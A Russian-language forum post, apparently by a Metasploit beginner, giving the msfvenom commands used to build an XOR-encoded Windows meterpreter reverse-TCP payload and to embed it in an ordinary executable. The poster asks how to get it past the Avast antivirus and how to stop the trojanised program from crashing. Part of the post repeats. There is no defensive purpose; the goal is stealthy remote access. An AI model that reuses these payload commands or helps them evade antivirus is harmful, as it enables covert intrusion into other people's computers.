Iridium2020
Member
- 13.11.2019
- 11
- 0
Все привет!. Недавно начал изучать metasploit и msfvenom на kali linux. В msfvenom практиковал с пейлодом (windows/x64/meterpreter_reverse_tcp). Применял разные виды шифрование (-e x64/xor, и другие x64 виды шифрования.) Ставил разные значения итеррации -i от 10 до 1000). Применял -b '\x00'. Отнюдь антивирус аваст мой все эти пейлоды в формате еxe блокирует напрочь. Без антивируса пейлод в процессах висит и могу подключаться внутри сети c другого компа. Встраивал пейлод в екзешные программы - Антивирус не блокирует)))) но программа вылетает.
Посоветуйте как можно преодалеть антивирус. Может чем то дополнить нужно параметры при создании пэйлода. Читал что антивирусы делают анализы по шаблонам которые внесены в их базе.
И еще помогите советом как можно преодолеть вылет программы езешной в которой встроен пейлод.
пейлод создавал таким образом
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=Мой IP LPORT=4444 -f exe -e x64/xor -i 50 --arch x64 --platform windows -o /root/Mypayload.exe
и вот так с какой либо экзешной программой
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST="Мой IP" LPORT=4444 -x /root/programma.exe -f exe -e x64/xor -i 50 --arch x64 --platform windows -o /root/Mypayload.exe
Заранее всем большое спасибо
Посоветуйте как можно преодалеть антивирус. Может чем то дополнить нужно параметры при создании пэйлода. Читал что антивирусы делают анализы по шаблонам которые внесены в их базе.
И еще помогите советом как можно преодолеть вылет программы езешной в которой встроен пейлод.
пейлод создавал таким образом
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=Мой IP LPORT=4444 -f exe -e x64/xor -i 50 --arch x64 --platform windows -o /root/Mypayload.exe
и вот так с какой либо экзешной программой
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST="Мой IP" LPORT=4444 -x /root/programma.exe -f exe -e x64/xor -i 50 --arch x64 --platform windows -o /root/Mypayload.exe
Заранее всем большое спасибо
